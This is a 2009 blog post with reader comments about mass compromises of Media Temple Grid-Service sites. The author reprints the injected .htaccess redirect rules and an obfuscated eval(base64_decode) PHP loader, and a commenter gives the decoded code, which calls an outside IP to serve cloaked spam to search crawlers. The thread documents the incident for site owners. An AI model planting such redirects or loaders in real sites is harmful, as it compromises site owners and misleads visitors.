Media Temple/WordPress hacked
15 November 2009 | Posted by Jeffrey Barke | 34 comments
Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a MediaTemple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.
While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4¶meter=sf [R,L]
I immediately knew that this install of WordPress had been comprised, but, prior to deleting the lines, I decided to Google them to find out more information about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.
It appears that this exploit is targeted at Media Temple's (gs) account and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected. All of them were on my (gs) account, including a domain that had Flyspray installed, but not WordPress.
All of the infected domains had the above code in the root .htaccess as well the following code in the root index.php:
<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.
This exploit has affected people running up to at least version 2.85 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out.
Jeffrey Barke is senior developer and information architect at theMechanism - New York, a multimedia firm with offices in New York, London and Durban, South Africa.
November 16th, 2009 at 3:07 am
My MT Grid Server account was hacked last week. My .htaccess and index.php files had the exact same changes as what you are showing here. When you decode, it points to some site in Asia.
However, my sites are all Joomla. So, I don’t think it is a vulnerability of Joomla, Drupal or Wordpress. Just a few days ago, my Media Temple FTP password was encrypted without asking them to do so. I’m beginning to suspect that they had some type intrusion.
Thanks for posting this. You should change the title to just Media Temple Hacked.
I have 20 websites and each was changed. This means that they most likely had full access to the root of my account.
If it’s happening to Joomla, Drupal and Wordpress sites, then my guess is Media Temple is to blame.
November 16th, 2009 at 4:10 pm
I hate to say “me too,” but me too. Yours was one of two sites that came up when I searched for “yje35zfv8SU” so thank you for your sleuthing and your post. MT did indeed send out a notice that it was changing my passwords so the problem may lie on their end, but wordpress has had its share of troubles lately. Whatever. I’ll fix and upgrade and secure. Thanks for your post.
November 16th, 2009 at 6:41 pm
Same happened to me. I installed WP but never used it. No Joomla or Drupal.
November 16th, 2009 at 6:51 pm
correction… i also had Drupal installed. never used it either.
November 17th, 2009 at 7:41 am
[...] This post was mentioned on Twitter by Alex Stenshin and Alex Stenshin, Alex Stenshin. Alex Stenshin said: MediaTempleは@に気をつけて更新のワードプレス、あなたのサイトをハッキングすることができます! http://bit.ly/1leoJN、http://bit.ly/4vGpMb [...]
November 17th, 2009 at 4:22 pm
Exact thing happened to a MT site running Wordpress for me too.
November 18th, 2009 at 5:42 am
me too. a client e-mailed me this morning and told me that he had seen strange porn site links in the source code of my site. i have some sites running on mediatemple’s grid service, and most of them use wordpress. updating wp to 2.8.6 alleviated the problem and removed the links, but then i saw that all hand-coded sites had the issue as well. O_O i will look into the issue further now. jeffrey, if there’s any updates on this, please post on your blog! i for sure will call mediatemple today and see if they have any idea about this thing.
argh.
November 18th, 2009 at 5:58 am
I can now confirm that about 80% of my sites at (mt) have been hacked. Info has been added to .htaccess AND index.html/index.php files.
November 18th, 2009 at 6:08 am
… and I can confirm that WP cannot be blamed, because also hand coded web sites (on domains that have no access to any WP code) have been altered.
Enough for now. Sites clean again, gotta get some coffee. Good luck, folks!
November 18th, 2009 at 5:06 pm
Thanks for the comments, everyone. I agree with you, Tim; it seems the incident was an FTP hack on Media Temple's end and had nothing to do with WordPress.
I noticed the same thing, Matt. 90% of the domains/subdomains on my (gs) account were affected. Only my .htaccess and index.html/index.php files were modified, but they were hacked on both hand-coded and WordPress sites. For what I've read, hand-coded, WordPress, Joomla and ExpressionEngine sites were affected. The latter were broken outright and so easy to spot.
Some people reported that Media Temple notified them of the intrusion via email, but I haven't received anything yet.
November 18th, 2009 at 5:08 pm
This post contains a 17 Nov 2009 update.
November 19th, 2009 at 8:25 am
Update: Media Temple e-mailed me with these words:
> Unfortunately, as we are still in the process of due diligence in this security matter so we cannot share more information at this time. We need to follow security protocol to allow any vendors to publish patches and updates before we can publicly announce anything definitive. And, while I agree wholeheartedly with [name deleted --m] that one should use strong passwords at all times, I can assure you that we have not seen any evidence that the malicious content on your server was a result of a brute force attack.
Hm hm. Time will tell, I guess.
November 22nd, 2009 at 10:35 pm
I stumbled across this on my (gs) sites as well when updating some WP-Super-Cache rules. MT should have emailed it’s grid customers about this.
November 23rd, 2009 at 1:49 pm
I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed.
The encoded PHP evaluates to this:
if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
{
$r = ”;
if($f=@fsockopen(‘91.207.4.18′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}
November 23rd, 2009 at 2:19 pm
Thanks for the info, Fwitz.
I still haven't heard anything from Media Temple and people are still discovering hacked web sites: http://search.twitter.com/search?q=mediatemple+hacked
November 23rd, 2009 at 2:29 pm
Actually, it seems Kyle Brady "got a lengthy, personal email from MediaTemple yesterday, and a long phone call today about this issue—I can't say a lot right now, but Media Temple is taking ownership of this problem, and is working on it. Details to come soon." 16 November 2009
http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#updates
November 24th, 2009 at 1:07 pm
Social comments and analytics for this post…
This post was mentioned on Twitter by stenshin: Be carefull updating wordpress on @mediatemple, your sites can be hacked! http://bit.ly/1leoJN, http://bit.ly/4vGpMb...
November 24th, 2009 at 2:04 pm
My friend and I are guessing that it’s trying to steal hotmail/gmail/yahoo mail accounts.
November 24th, 2009 at 7:29 pm
Same thing here… GS customer with an outdated version of Drupal installed, but not in use. I received an email about suspicious FTP use. Sure enough, every one of my domains compromised.
November 26th, 2009 at 1:11 am
Thanks so much for this post.
All my wordpress websites were hacked, even though I have so much “security” it’s ridiculous. Stealth Login, Login Lockout, Antivirus and Firewall plugins installed and running on all wordpress sites, plus stupid long passwords that are randomly generated with special characters, numbers and letters.
Now today I receive an email from MT telling me of suspicious FTP activity on my account overnight, and they’ve disabled my FTP access.
Except, they havent disabled it for ALL accounts, just one – which is USELESS.
So Ive removed all FTP from all accounts other than my own, reset the passwords, cleaned all the wordpress installs and .htaccess files.
I can only hope MT and WP are speaking to each other to find a solution.
November 26th, 2009 at 2:11 am
me too. i actually got a response from a media temple tech that intimated the all the hacks were done through my server admin account. either I’m misunderstandig and he simply means all the hacks on my (gs) were done via my server admin, or i have to really reassess their security procedures and protocols if my serveradmin account was able to hack other people’s (gs) accounts.
November 26th, 2009 at 3:22 am
apparantly MediaTemple were storing passwords in plain text!
That’s the twitter goss.
November 26th, 2009 at 9:47 am
[...] number of people (Michael Torbert, Kyle Brady, Jeffrey Barke, Adrian Hanft) are reporting that their Media Temple sites have been hacked. Digging Into WordPress [...]
November 26th, 2009 at 5:21 pm
Hey folks,
If you haven’t read this already:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
It will answer lots of your questions.
If you find ftp access isn’t working, please submit a support request. Passwords were changed (as you know) but ftp access wasn’t disabled.
Matt from (mt)
November 26th, 2009 at 9:16 pm
Me too. Mediatemple did not fess up to the vulnerability but after they reset my passwords without my permission (then proceeded to have two hours of downtime so I couldn’t reset my password), I figured it had to be their problem.
Also, when I called in, they asked me for my password, and they said OK quickly enough to let me know the support guy was looking at a plain text version of my password (he couldn’t have typed it in to check that quickly). This means they don’t store a one-way hash of the password, but the actual password. This is poor, poor security IMHO.
I’d like a year of paid hosting or an upgrade to DV for the hassle. All my sites were affected and trying to pick through which files were affected and which were not is a royal PITA.
November 27th, 2009 at 2:49 am
[...] the extent of the security breach. My understanding of the incident, (as also blogged here and here), is that someone got ahold of many of the admin passwords for Grid Service (GS) accounts and thus [...]
November 29th, 2009 at 11:37 am
Thanks for the link, Matt. It's definitely worth following and reading.
According to Media Temple, aaron, they're "not certain this exploit is directly related to the way we were storing passwords," which do appear to be stored in plain text. But I agree with you—if the passwords were not stored as one-way hashes, it was poor security.
November 29th, 2009 at 4:30 pm
[...] passwords were stolen. In addition, many codes were added to people’s files. According to Jeffrey Barke, there were codes injected in index.php, and while there were codes injected in other parts of the [...]
November 30th, 2009 at 7:28 pm
(mt) Media Temple just posted a new update on the spam injection issue with some new info and progress updates.
check it out here:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
December 2nd, 2009 at 2:06 pm
All my sites hosted with Media Temple were compromised. Both .htaccess and index.php files modified in Joomla or wordpress directories – different accounts. The interesting thing about this is that the perpetrators were able to access the admin control as well and turn on SSH and create a separate admin user. Media Temple surely got caught with their pants down due to lack of security. Who ever crashed this party surely isn’t interested in a reality show – unless their name is Kevin Mitnick.
December 3rd, 2009 at 7:58 am
[...] post: JeffreyBarke.net » Blog Archive » Media Temple/WordPress hacked By admin | category: media temple | tags: account, kyle-the-invincible, media temple, [...]
December 9th, 2009 at 3:02 am
Hi Jeff!
It seems to me that this is very similar to what went on at DH just about a year ago, if I’m not mistaken!
December 19th, 2009 at 4:16 pm
I got a call from a client this morning saying their Drupal site was down. After finding the problem and this post the issue is exactly the same as what’s posted above.
The scary thing is that I am on a DV server. Don’t think that this is just a GS issue.
Just about to contact mediaTemple. I’ll post back if I find out anything extra.
March 11th, 2010 at 3:15 am
By far the most concise and up to date information I found on this topic. Sure glad that I navigated to your page by accident. I’ll be subscribing to your feed so that I can get the latest updates. Appreciate all the information here